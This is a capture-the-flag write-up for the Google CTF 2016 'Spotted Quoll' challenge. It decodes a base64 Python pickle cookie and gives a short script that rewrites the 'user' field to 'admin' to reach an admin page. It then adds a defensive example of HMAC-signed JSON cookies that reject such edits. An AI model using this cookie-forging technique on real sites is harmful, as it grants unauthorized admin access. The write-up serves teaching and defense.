Google CTF 2016 // Spotted Quoll (50 points)
Capture the Flag, Google CTF, April 29, 2016
This challenge required us to get access to the admin page of a research website about zombies.
We were presented with a page containing a button that links to the website’s /admin page. Clicking this button caused the server to redirect back to the homepage and send a cookie to the browser.
The cookie’s value was:
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu
Our first instinct was that this cookie was encoded in base64. After decoding it, we ended up with the following ASCII:
(dp1\nS'python'\np2\nS'pickles'\np3\nsS'subtle'\np4\nS'hint'\np5\nsS'user'\np6\nNs.
This text is in the form of a Python pickle! By loading the string into a dictionary, we could change the value stored under the ‘user’ key. Re-encoding the pickle in base64, we managed to get access to the admin page and get our flag!
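import base64
import pickle

# The cookie is a base64-encoded pickle; pickle.loads is only safe on data you trust.
def decode(a): return pickle.loads(base64.b64decode(a))
# Protocol 0 reproduces the text pickle format seen in the original cookie.
def encode(a): return base64.b64encode(pickle.dumps(a, protocol=0)).decode()
a = decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")
a['user'] = 'admin'
print(encode(a))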
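The cookie could be edited because the server accepted an unsigned, client-held pickle as its source of truth for the user. As an added example (not part of the original write-up or the challenge's code), here is one way a server could issue and check such a cookie instead: JSON rather than pickle, authenticated with HMAC-SHA256. The names SECRET_KEY, issue_cookie, verify_cookie and is_admin are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Assumption: a per-deployment secret that never leaves the server.
SECRET_KEY = secrets.token_bytes(32)

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()

def _tag(payload: bytes, key: bytes) -> bytes:
    return hmac.new(key, payload, hashlib.sha256).digest()

def issue_cookie(session: dict, key: bytes = SECRET_KEY) -> str:
    """Serialize as JSON (data only, nothing executes on load) and sign it."""
    payload = json.dumps(session, sort_keys=True, separators=(",", ":")).encode()
    return _b64(payload) + "." + _b64(_tag(payload, key))

def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the session dict, or None if the cookie is malformed or altered."""
    try:
        payload_b64, tag_b64 = cookie.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:  # wrong number of parts or bad base64 (binascii.Error)
        return None
    # Check the tag before parsing the payload; compare in constant time.
    if not hmac.compare_digest(tag, _tag(payload, key)):
        return None
    try:
        session = json.loads(payload)
    except ValueError:
        return None
    return session if isinstance(session, dict) else None

def is_admin(cookie: str) -> bool:
    session = verify_cookie(cookie)
    return session is not None and session.get("user") == "admin"

if __name__ == "__main__":
    # Constructed sample mirroring the fields of the challenge cookie.
    good = issue_cookie({"python": "pickles", "subtle": "hint", "user": None})
    payload = json.loads(base64.urlsafe_b64decode(good.split(".")[0]))
    payload["user"] = "admin"
    forged = _b64(json.dumps(payload).encode()) + "." + good.split(".")[1]
    print(verify_cookie(good), is_admin(forged))
```

With the signature in place, the edit shown in the write-up yields a cookie whose tag no longer matches, so the server treats it as absent rather than as an admin session.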